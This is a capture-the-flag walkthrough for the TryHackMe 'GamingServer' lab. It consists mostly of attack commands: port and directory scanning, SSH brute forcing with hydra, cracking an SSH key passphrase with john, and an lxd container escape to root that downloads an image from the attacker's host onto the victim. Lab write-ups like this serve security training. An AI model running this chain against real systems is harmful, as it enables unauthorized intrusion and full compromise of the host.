GamingServer
Room Link: https://tryhackme.com/room/gamingserver
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
SSH port 22
Tried bruteforcing ssh with johns username and the dictionary file we found but it didn't work
Kali
hydra -l john -P dict.lst ssh://$VICTIMTCP/80 - HTTP
SSH port 22
After finding the key I bruteforced that with the dictionary list found
Kali
chmod 700 secretKey
/opt/john/ssh2john.py secretKey > id_john.txt
john --wordlist=/root/dict.lst id_john.txt 
Kali
ssh -i secretKey john@$VICTIM
Password: letmein
Privilege Escalation
Followed this link on lxd privilege escalation
Link: https://www.hackingarticles.in/lxd-privilege-escalation/
Victim
id
Kali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81Victim
cd /tmp
wget http://10.10.73.204:81/alpine-v3.18-x86_64-20230712_1453.tar.gz
lxc image import ./alpine-v3.18-x86_64-20230712_1453.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
Last updated